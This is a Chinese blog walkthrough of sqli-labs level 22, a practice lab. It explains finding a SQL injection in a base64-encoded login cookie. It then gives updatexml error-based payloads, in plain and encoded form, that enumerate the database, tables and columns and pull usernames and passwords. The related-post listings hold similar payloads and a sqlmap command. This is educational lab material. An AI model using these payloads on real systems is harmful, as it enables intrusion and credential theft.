sqli-labs关卡22(基于cookie被base64编码的报错盲注)

最新推荐文章于 2024-05-20 20:26:39 发布
最新推荐文章于 2024-05-20 20:26:39 发布
阅读量987 收藏 20
点赞数 13
文章标签: 数据库 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/135595764
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾上一关知识点

上一关是基于cookie被base64编码的报错注入,突破点就是如何找到是cookie注入,并且能够识别base64编码形式。这一关只是闭合形式变了,原理一样。

二、靶场第二十二关通关思路

  • 1、判断注入点
  • 2、爆数据库名
  • 3、爆数据库表
  • 4、爆数据库列
  • 5、爆数据库关键信息

1、判断注入点

这里我们有了前几关的思路,我们登录测试账号admin/admin
发现和上一关一样,有cookie回显,我们也是可以猜测是cookie与数据库交互然后输出到web界面了。但是发现cookie值有等于号,是典型的base64编码形式。(如图所示)
在这里插入图片描述
这里我们通过bp抓包进行测试发现输入双引号的时候发现报错,看报错信息说明是双引号闭合。(如图所示)
报错信息为

Issue with your mysql: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near ‘“admin”" LIMIT 0,1’ at line 1

payload为

admin"

YWRtaW4i

第一个是原始语句,第二个是base64编码的语句,也就是我们要拼接到数据库的语句
在这里插入图片描述
所以我们闭合掉多余的双引号
最终的payload为

admin"#

YWRtaW4iIw==

2、爆数据库名

因为有报错信息,没有回显账号数据,我们用报错注入。
payload为

admin" and updatexml(1,concat(0x3a,(select database()),0x3a),1)#

YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzYSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4M2EpLDEpIw==

在这里插入图片描述
得到数据库名字

3、爆数据库表

payload为

admin" and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzYSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDMsMSksMHgzYSksMSkj

在这里插入图片描述

4、爆数据库列

payload为

admin" and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzYSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWU9InVzZXJzIiBsaW1pdCAxLDEpLDB4M2EpLDEpIw==

admin" and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzYSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWU9InVzZXJzIiBsaW1pdCAyLDEpLDB4M2EpLDEpIw==

在这里插入图片描述
在这里插入图片描述

5、爆数据库关键信息

payload为

admin" and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzYSwoc2VsZWN0IHBhc3N3b3JkIGZyb20gdXNlcnMgbGltaXQgMCwxKSwweDNhKSwxKSM=

admin" and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzYSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gdXNlcnMgbGltaXQgMCwxKSwweDNhKSwxKSM=

在这里插入图片描述
在这里插入图片描述

总结

这一关的方法和上一关大差不差,主要是要知道http头部注入的方法,能看得出base64编码。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

无名小卒且不会安全的zzyyhh
关注
  • 13
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLI-LABS 靶场通关小记(1~22
曹振国的博客
07-14 2735
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sqli-labs/Less-22
m0_71299382的博客
11-19 157
sqli-labs第二十二关
sqli-labs11-22关闯关心得与思路
m0_48294281的博客
03-28 3958
sqli-labs11-22关闯关心得与思路
Sqlilabs-22
KAKA的博客
07-09 381
这里来到了第一阶段的最后一关:22 关 其实跟 21 关一样,只不过变成了双引号 " 而已,直接上菜吧o( ̄▽ ̄)ブ uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM= uname=admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))# 怎么猜单引号加括号,这里当你构造好 payload pos
SQLi LABS Less-22
热门推荐
wangyuxiang946的博客
08-14 1万+
22关使用POST请求提交参数,对账号和密码中的特殊字符执行了转译的操作,难度较大 这一关的重点在于Cookie,用户登录成功后,将base64编码后的用户名保存到Cookie中 点击提交按钮时,会从Cookie中获取用户名,使用base64解码后,查询数据库,以此来判断用户是否处于登录状态,我们可以利用Cookie来进行SQL注入 将payload使用base64进行编码 1" and updatexml(1,0x7e,1) -- a MSIgYW5kI..
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs(22
weixin_30339457的博客
05-27 180
接下里我们进入第二二关 好像和第21关一样 cookiebase64加密注入 闭合变成了双引号而已 0X01 构造语句进行尝试 " union select 1,2,3# IiB1bmlvbiBzZWxlY3QgMSwyLDMj 嘿嘿 好像成功了 那语句就不多说了 老规矩 一套组合拳打到低 切记 学习之路 少就是多 转载于:https:...
sqli-labs第22关基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 453
22关基于cookie报错注入 sqlmap 方法 python2 sqlmap.py -r 1.txt --cookie uname=YWRtaW4= --tech E --dbms mysql --tamper base64encode.py --batch -v 0 手注 一、判断注入点 通过源码我们可以发现,闭合点是双引号 然后我们基于21关进行构造语句 一、猜注入点: admin " and extractvalue(1,concat(0x7e,( 1),0x7e))# YWRtaW4gI
sqli-labs——保姆级1~22闯关详解
sGanYu
08-06 1651
目录 【Less-1】GET-Error based -Single quotes -String/错误的GET单引号字符串型注入 【Less-2】GET-Error based -intiger based/错误的GET数值型注入 【Less-3】GET-Error based -Single quotes with twist -String/错误的GET单引号变形括号型字符型注入 【Less-4】GET-Error based - Double Quotes - String/错误的GET双.
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7326
sqli-labs,sql注入,burpsuit
sqli-labs 20-22关详解
weixin_43061418的博客
09-01 494
cookie基本知识 20关 21关 22
【hackmyvm】Slowman靶机
最新发布
woshicainiao666的博客
05-20 121
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密的密码。
mysql事务(原理)
m0_74347016的博客
05-19 513
mysql事务原理
生产报表工具PI DataLInk 与 行列视之间的区别
2401_83701843的博客
05-17 245
行列视,全名“行列视生产数据应用系统”,行列视品牌所面对的业务范围远远超越了PIDatalink报表工具,他首先是一款本地部署的在线Excel文档管理系统,解决个人报表在线管理问题,其次,她和PIDataLInk一样,也是面向实时数据库报表需求的一套工具,其区别在于行列视品牌兼容国内外大多数实时数据库,也可以同时连接多个数据源,也就是她完全可以替代PI-DataLINk,同时也适用于其他品牌下的实时数据库系统;
MySQL存储过程添加二十万条数据日常练习
mi_mx的博客
05-17 301
【代码】MySQL日常练习。
sqli-labs第七关盲注
08-31
对于sqli-labs的第七关,这是一道关于盲注的挑战。在这个关卡中,你需要利用盲注漏洞来获取敏感信息。 盲注是一种利用应用程序对用户输入的处理不当而导致的漏洞。这种漏洞通常出现在应用程序使用用户提供的数据来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值